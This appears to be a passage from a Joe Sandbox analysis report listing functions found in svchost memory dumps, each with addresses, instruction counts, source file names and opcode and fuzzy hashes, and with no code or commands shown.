                                                                                      • Instruction ID: 0fb4224aaf93eaafdcec07b4d640b1b6fd1bddc74c9069578f59f418d09c59af
                                                                                      • Opcode Fuzzy Hash: fb7dbd14ab50a746285872e778c8c4914d1efc5a168b3818634177a8d625230d
                                                                                      • Instruction Fuzzy Hash: 1A21D322F0F69A4FD716B7ACAC754E97BB1EF42214B0902F7C099CB0E3ED1864468354
                                                                                      Function 00007FFD9B8A09C8 Relevance: .2, Instructions: 239COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fe97432a0ee633e14b41000bf8e708c909b76e29f6e3948a4d78d17767579e1
                                                                                      • Instruction ID: 794f54e71c343e2cc2f29d07d9b7cb3a6fe8a6b3d00c49d433b7749e7c73d56b
                                                                                      • Opcode Fuzzy Hash: 9fe97432a0ee633e14b41000bf8e708c909b76e29f6e3948a4d78d17767579e1
                                                                                      • Instruction Fuzzy Hash: 90615966B1956E8EDB0ABBBCB825AFD7B61EF85325F4442BBD00CC71D3DD2460468390
                                                                                      Function 00007FFD9B8A0E4E Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a23b540bc72c172875b1b1c5bb230d39e6c6b629ee4b9bb50befa6cc663af20
                                                                                      • Instruction ID: d1c975a00489bd75a8f838f287430b2ddb04464d213fe5de374e1d3f78b1b237
                                                                                      • Opcode Fuzzy Hash: 9a23b540bc72c172875b1b1c5bb230d39e6c6b629ee4b9bb50befa6cc663af20
                                                                                      • Instruction Fuzzy Hash: A7510821B1EACA0FE356A77C98255B93BE1DF86624B0941FBD08DC71E7DC1C5C468362
                                                                                      Function 00007FFD9B8A0AFA Relevance: .2, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb3d9dac4df8d40891fd6d3e9d2a5cbb799588aa808373a679d20e9884ba94a8
                                                                                      • Instruction ID: 6239bbccb85d9c2a3660bb50c22aed07bdec1a6811d34a888a52522a96304583
                                                                                      • Opcode Fuzzy Hash: bb3d9dac4df8d40891fd6d3e9d2a5cbb799588aa808373a679d20e9884ba94a8
                                                                                      • Instruction Fuzzy Hash: 7D511375B1995A8FDB09BB78E821AFC7BA1EF89315B4401BAD008C72D3DD3464468790
                                                                                      Function 00007FFD9B8A0620 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cb3e44268143798b48a05e4ba1a2e2a5d1e57c760668572d009c25342faa2a8c
                                                                                      • Instruction ID: fc861c578ef0476ce9fd12d39f4a83a87b86c129e3666eb5ecaa547772a6183b
                                                                                      • Opcode Fuzzy Hash: cb3e44268143798b48a05e4ba1a2e2a5d1e57c760668572d009c25342faa2a8c
                                                                                      • Instruction Fuzzy Hash: E031F921B189480FE798EB6C986A678B7C2EF9C705F0505BEE05EC32E7DD54AC018341
                                                                                      Function 00007FFD9B8A0CE1 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 401261c31ac82a67861de50c5573ece0fb6526e5028e0e757c85fa8eca461c68
                                                                                      • Instruction ID: fb62130fe7eed7c01b4d3fca142bf75acb294752d8fd501c1fe21a8372ea58a8
                                                                                      • Opcode Fuzzy Hash: 401261c31ac82a67861de50c5573ece0fb6526e5028e0e757c85fa8eca461c68
                                                                                      • Instruction Fuzzy Hash: 1731D622B19A094FE759B7BC5C297FC76D1EF98611F0402BBE00DC31D7DD2868024391
                                                                                      Function 00007FFD9B8A0949 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7a9175369aec7ce2e815c4220129e2a84f9180372adeb4b8da4839a4f3be924a
                                                                                      • Instruction ID: 8e06518f90133f2e1b2b46ae89611d77e732cc4872f04bcaaac8a657b9d08b0a
                                                                                      • Opcode Fuzzy Hash: 7a9175369aec7ce2e815c4220129e2a84f9180372adeb4b8da4839a4f3be924a
                                                                                      • Instruction Fuzzy Hash: 2711511A6096B98ED706B7B8B8A44E87B60DE4222971803F3D1858E0979518508B8795
                                                                                      Function 00007FFD9B8A2221 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81f326e4c1db2ddc16adaf1ff0e426e3263956ac22112c4f9c5b57b90ecee4be
                                                                                      • Instruction ID: 5d3340729feba94e3faac1be75212c85cb997cbc75ce8767cdbf6e56a6ec3a22
                                                                                      • Opcode Fuzzy Hash: 81f326e4c1db2ddc16adaf1ff0e426e3263956ac22112c4f9c5b57b90ecee4be
                                                                                      • Instruction Fuzzy Hash: AB012B55E0EB8A0FE775A7B85875575BFE0CF99340B0904BAE888C61F7EC085A4583A2

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B8916D9 Relevance: .8, Instructions: 755COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4680ae6bc16b7c6ace4410ffd5a52751e3bf205c4597f44c6ba50a0993f959f6
                                                                                      • Instruction ID: 9d7771a6ff46a2dd71d31c748caf1306f4ddaa879e014afd404babff091c04c3
                                                                                      • Opcode Fuzzy Hash: 4680ae6bc16b7c6ace4410ffd5a52751e3bf205c4597f44c6ba50a0993f959f6
                                                                                      • Instruction Fuzzy Hash: 1132C721B29E094FEB98FB7C98697B977D2FF98304F410579E01EC32D6DE28A9418741
                                                                                      Function 00007FFD9B892059 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95d180d345f184bea75e8e55b547fc308c6049048c830fe6aa92c7fd0fa021e8
                                                                                      • Instruction ID: cea667090fded9ea441cd48f5d7beb1dda4575fb0fa03f2371707543fe5e021d
                                                                                      • Opcode Fuzzy Hash: 95d180d345f184bea75e8e55b547fc308c6049048c830fe6aa92c7fd0fa021e8
                                                                                      • Instruction Fuzzy Hash: 91510210B1E6C94FEB5AABB858746657FE5DF8B219B0900FBE0D9C71E7DD081806C342
                                                                                      Function 00007FFD9B891244 Relevance: .5, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad8c6d54b51598b2a93486852fc52961cda00cb45a615a69a0d07ea85a0e1cd6
                                                                                      • Instruction ID: f9d0f338550b5d28f7f3e307ddb0ce9bbea050e6552b9d8af28042b8687d8e10
                                                                                      • Opcode Fuzzy Hash: ad8c6d54b51598b2a93486852fc52961cda00cb45a615a69a0d07ea85a0e1cd6
                                                                                      • Instruction Fuzzy Hash: 7B21E722F0E7AA4FEB16B7ACACB54D97FB0EF41214B0901B7D095CB0E3ED1864468340
                                                                                      Function 00007FFD9B8909C8 Relevance: .2, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c442075fea06383d1a8dda80c84102b3e22d5792a3dd21ae05ba4d92bb78643
                                                                                      • Instruction ID: 1f8c14b5ce0bfaba193a02f294b3efba1c2c21b6468ded6ee0e4c4e2b68aeeae
                                                                                      • Opcode Fuzzy Hash: 2c442075fea06383d1a8dda80c84102b3e22d5792a3dd21ae05ba4d92bb78643
                                                                                      • Instruction Fuzzy Hash: D7615D22B1992A8FDB0AB7BCA8256ED7FA1EF85325F0401BBD119C71D3CD286446C3D1
                                                                                      Function 00007FFD9B890E4E Relevance: .2, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70dbd53c69ec15be96a2b9f8f99facd928a1d1396c3fc4ea350d5e9655b4cee7
                                                                                      • Instruction ID: 1f09695186de9eb5dd923c719af5f3cc35598892620adb2478ef859270c985d1
                                                                                      • Opcode Fuzzy Hash: 70dbd53c69ec15be96a2b9f8f99facd928a1d1396c3fc4ea350d5e9655b4cee7
                                                                                      • Instruction Fuzzy Hash: 65512721B1EA8A0FE356A77C98266B93FE1DF86224B0940FBD08DC71E7DC0C5C468352
                                                                                      Function 00007FFD9B890AFB Relevance: .2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e20f59ecc5bf4bfcbc5f70d206417c3ac999ee426ef939d173d06428a5ff78a0
                                                                                      • Instruction ID: 46fb317b2976632bf118f827b81ad5c813305fa34efca144b972c669cf40ada8
                                                                                      • Opcode Fuzzy Hash: e20f59ecc5bf4bfcbc5f70d206417c3ac999ee426ef939d173d06428a5ff78a0
                                                                                      • Instruction Fuzzy Hash: E2515C31B199298FDB0ABBBCE8256ED7BA1EF88315F0400B7D108C72D3DE3864468791
                                                                                      Function 00007FFD9B890620 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4a3577f31b6dd6a062fbbc40ea970e710a658b5970e4946c79e49d980b77575
                                                                                      • Instruction ID: 0006bceb1e5e9cc7387d5409b973a1d7645f69199bede8b9ae13ad8d35579ec0
                                                                                      • Opcode Fuzzy Hash: f4a3577f31b6dd6a062fbbc40ea970e710a658b5970e4946c79e49d980b77575
                                                                                      • Instruction Fuzzy Hash: D831E821B189484FEB9CEB6C9869679A7C2EF9C715F0505BEE04EC32E7DD58AC418341
                                                                                      Function 00007FFD9B890CE1 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction ID: 95025bffb81b61f83d03ad5ec39e9e600e06fb03cb74d898df4997138a206678
                                                                                      • Opcode Fuzzy Hash: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction Fuzzy Hash: 0031B461B19A094FEB99B7BC5C297FC7AD1EF98651F1402BBE01DC32D7DD2869028381
                                                                                      Function 00007FFD9B890949 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction ID: 8338654542284b9a8cd213ffd579302b9110d5ff86045273ba30dc6a955f983c
                                                                                      • Opcode Fuzzy Hash: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction Fuzzy Hash: 71119E2A6087B18EC707B7B8B8A45D8BB60DE4226971801F7C2CACE4879518648B87E1
                                                                                      Function 00007FFD9B892221 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.2592493908.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 20733231adffcf21d0fddb3473a6c26379845254aa4e0381a73cc4b7d0570b60
                                                                                      • Instruction ID: 486ec8a98abb0cf2bec319efc215067c15b1ac8afd2e8004f1037e1ba9ee349f
                                                                                      • Opcode Fuzzy Hash: 20733231adffcf21d0fddb3473a6c26379845254aa4e0381a73cc4b7d0570b60
                                                                                      • Instruction Fuzzy Hash: 48017B04E0EB8A4FEB65A7F85C75431BFE0CFD9740B0900BAE888C20F7D8086A458392